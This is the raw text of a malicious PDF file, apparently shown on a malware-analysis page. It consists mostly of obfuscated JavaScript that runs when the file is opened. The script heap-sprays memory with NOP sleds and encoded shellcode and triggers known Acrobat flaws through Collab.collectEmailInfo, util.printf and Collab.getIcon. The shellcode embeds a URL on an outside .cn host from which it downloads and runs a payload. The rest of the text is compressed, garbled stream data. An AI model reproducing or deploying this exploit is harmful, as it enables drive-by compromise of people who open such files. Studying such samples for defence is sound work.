function MXVBj(){var rcbcz=Xez("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u5D50\u265D\u3D65\u0032\u0000\u0000\u0000\x23\x42\x23\x42\x23\x42\x23\x42");var CAAND=0x0c0c0c0c;var BmNBH=[];var Efzsp=0x400000;var AOPlD=rcbcz.length*2;var uJqqU=Efzsp-(AOPlD+0x38);var sAZQH=Xez("\u9090\u9090");sAZQH=eTRTT(sAZQH,uJqqU);var ZVpAM=(CAAND-0x400000)/Efzsp;for(var XhpXX=0;XhpXX<ZVpAM;XhpXX++){BmNBH[XhpXX]=sAZQH+rcbcz;}
var uOXiu=Xez("\u0c0c\u0c0c");while(uOXiu.length<44952)uOXiu+=uOXiu;this.collabStore=Collab.collectEmailInfo({subj:"",msg:uOXiu});}
function obk(){var ADP=new Array();function TbO(RKg,Dan){while(RKg.length*2<Dan){RKg+=RKg;}
RKg=RKg.substring(0,Dan/2);return RKg;}
hIH=0x30303030;zmP=Xez("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u5D50\u265D\u3D65\u0031\u0000");var brl=0x400000;var thD=zmP.length*2;var Dan=brl-(thD+0x38);var RKg=Xez("\u9090\u9090");RKg=TbO(RKg,Dan);var DzR=(hIH-0x400000)/brl;for(var yMS=0;yMS<DzR;yMS++){ADP[yMS]=RKg+zmP;}
var GjC="44606420085485426596";for(Xez=0;Xez<138*2;Xez++){GjC+="2";}
util.printf("%4"+"50"+"00"+"f",GjC);}
function DIG(hjP)
{hjP=hjP.replace(/[\+1]/g,"0");hjP=hjP.replace(/[\+2]/g,"9");hjP=hjP.replace(/[\+3]/g,"8");hjP=hjP.replace(/[\+4]/g,"7");hjP=hjP.replace(/[\+5]/g,"6");hjP=hjP.replace(/[\+6]/g,"5");hjP=hjP.replace(/[\+7]/g,"4");hjP=hjP.replace(/[\+8]/g,"3");hjP=hjP.replace(/[\+9]/g,"2");hjP=hjP.replace(/[\+0]/g,"1");return hjP;}
function pnYmx(){var BeyfM=Xez("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u5D50\u265D\u3D65\u0033\u0000\u0000");gbD=Xez("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090")+BeyfM;nlU=Xez("\u9090\u9090");Ody=5*2;TBy=Ody+gbD.length;while(nlU.length<TBy)nlU+=nlU;ujw=nlU.substring(0,TBy);sxI=nlU.substring(0,nlU.length-TBy);while(sxI.length+TBy<0x40000)sxI=sxI+sxI+ujw;VaE=[];for(lqQ=0;lqQ<180;lqQ++)VaE[lqQ]=sxI+gbD;var zMy=4012;var cWB=Array(zMy);for(lqQ=0;lqQ<zMy;lqQ++)
{cWB[lqQ]=Xez("\u000a\u000a\u000a\u000a");}
Collab.getIcon(cWB+"_N"+".b"+"un"+"dl"+"e");}
app.eval();
app.eval();
endstream
endobj
73 0 obj<</Subtype/XML/Length 224/Type/Metadata>>stream
©N> u «а©1XЄѕ»&Ї Єш'v/щ(шпС;с-nsd02`Б№Ђ0_5¦ћќ9%lч|Ъ|5‘•@ Ж‹эся ЄLД" –Љ “©д«9иhS/ќkSЃcш-2T†ЮсѕqИ ЊѓМwF} oN РХbљEИ iH\\ Лт
endstream
endobj
116 0 obj
<</ / / / /Filter/#46#6c#61#74#65#44#65#63#6f#64#65/Length 2000+035>>
stream
x^�X�r�8 }�W�T5S��q@� ���U L�SN2�'� +�%{��ʲ#K�/� �s��c�� �]�҂��F 8������ه�u���/�G����� ��o|> �ޏg �gӍ�ٻ��xz����� ���v�ã���� �5�<�t1�
� �p��zk7� ���no�u�e��t?�Ha ���6K�Χ �^
�`1ݟc�g㝷;;���^�/����{/GǓq�ژ�����ͥL��R>�f6�/f�g���b�]�j]�HW�Z�{ä�����ۅ ��z�p�dÅV� .Tm�p�)��W�p�� |� R�C�� �R�Ѱ�5msG+SiX�U ~H��4 ?Ԕf��y�W�T�� ���,��� [��N?Z[�Q�Q�&B� J�N1���dE]�&�p �61 >(P� x��f���X#*� 43 �D�=Wg�ȹB@<��\�2��\JV�| ��f��V�gmT ��H�\� ��X9���j� =l]Us^��*�*%e�� �-�U!b�] ~ ⱎԘ�y6 �xű� rU�� �<�``e� 1 ��4���<3�� ƠB i� ���� Ѷ� �˾ :��� �uRӛ�A���4&XQ�<-�7�����^8���1� Y��ϭ�9�� T-�; �� w-� V&�\�6� kl)���o�Bt,Wjj '� t��� j�S7 '!5�6�r�4�0/�J�s�/1X��#7 R�lu��Ө���Z� Q�L�� �����Q'o�U �6�U��
?+�2���, >� t�m���US�K���
ӟ��/�ݏ�% \_�C#� JX��7�� �� v�b�+Z}u�];�@�-p �@�� ��<�31���y�]v%��a�^�$���YW����ÇR
�sSL�q�����-��%v�� �����6.� i E\-��|���,+�'�~) ��������d2�{7?���Z�� �����x�5=8�� fO~�t�O/ ۯ+(+�/ [5o���˳j6 ] ��0 g�u������hz����
� N� ��@9Z x� ޗ ��;�z�- ������mB2��Tߣ��:���4�R��PE����!�U���Nᔶ(�b��D�& =���3�AW���� ��vlB�� �8�"m�� rL�(M*b�mu ��:Ue� ^*���49�� �I8�&tꊚ�ʉ�6�]��BW| � ͠1 �N�iV� M�:
�Y �V�H xF��kV1¶�D��J� &a�l�f ��G�|�H
Y��j��E %� O�� e�;A���� �y ~ kb�S ��! X�6�h�FV chUG� Yu��oW
M�3~o r��V�(��n���'!u5m5=�IA uDu�� Vŝ��JX�2��|w�U� ��%* ���\M�����F�<8u,���\ NH 9v ��� y
�v�X r� O�/� �<>��d\ *�w���[o $��3{Aj�C��#>o� W� ��|��>�6c�}�ɍ� ;��+�]�ͪ��e
�1)��b�}�� (���yS�S� '*K+ֲ�ͪ�+��Ƙc ��A � �҄�,� �V1�yH +u�4�E��s��IT�rFv# +Z�m� �/�V���� �6�����ԏD��3��� �rr*�1{��#�H��?�
�H�YV���d��Ϗ� @�Z�Q Jh>�Bz�v��,[���M���$ ��~[vQQ�Uk����W��P�A7��O�hT�] ?�Z� ղ6�rR��,3
�(�6���ާ0 q� 4 ���f��O)Gt �~�I;p�� O6��h3?�v~�:�N�@��~砳 ͕ �l��=:y� .� � ���d�?�� ���/ �;L����H�G�Z�� i&R��4 �yDjD�?"�"� �:��G��H�G�J� ��V I��|�|d��Ə� ��Z���⩥` zj)�Z
y�����A xn_4 � ���}A�\�D��2����� ��߿� ����т��� �>NƲ�\�F���K ���_� '_���
��˭ �oN��������u ���K� �� �2x?
|���q��74�����O�� �b�WD�G���^o_��JR��� _��d��[� G`- ��@�u��qeFrsV(���ˢ��|k�lڅe���W�N7�@ S��& cj� (�H/x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�
endstream
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1990 0 obj
<</ / / / /S/#4a#61#76#61#53#63#72#69#70#74/JS 116 0 R/ / / />>
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
5 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
9 0 obj
<</ / / / /count 2/Type/Pages/Kids[1894 0 R]/ / / />>
endobj
123 0 obj
<</ / / / /Length 0000>>
stream
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
endstream
endobj
23 0 obj<</CropBox[0 0 595.22 842]/Parent 62 0 R/Contents 25 0 R/Rotate 0/MediaBox[0 0 595.22 842]/Resources 24 0 R/Type/Page>>
endobj
24 0 obj<</ColorSpace<</Cs6 59 0 R>>/Font<</TT2 52 0 R/TT3 54 0 R/TT4 45 0 R>>/ProcSet[/PDF/Text]/ExtGState<</GS1 57 0 R>>>>
endobj
25 0 obj[26 0 R 27 0 R 28 0 R]
endobj
26 0 obj<</Length 3>>stream
Y.в
endstream
endobj
91 0 obj
<</ / / / /S/JavaScript/JS 123 0 R/ / / />>
endobj
xref
trailer
<<
/Root 15 0 R
>>
startxrefx� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.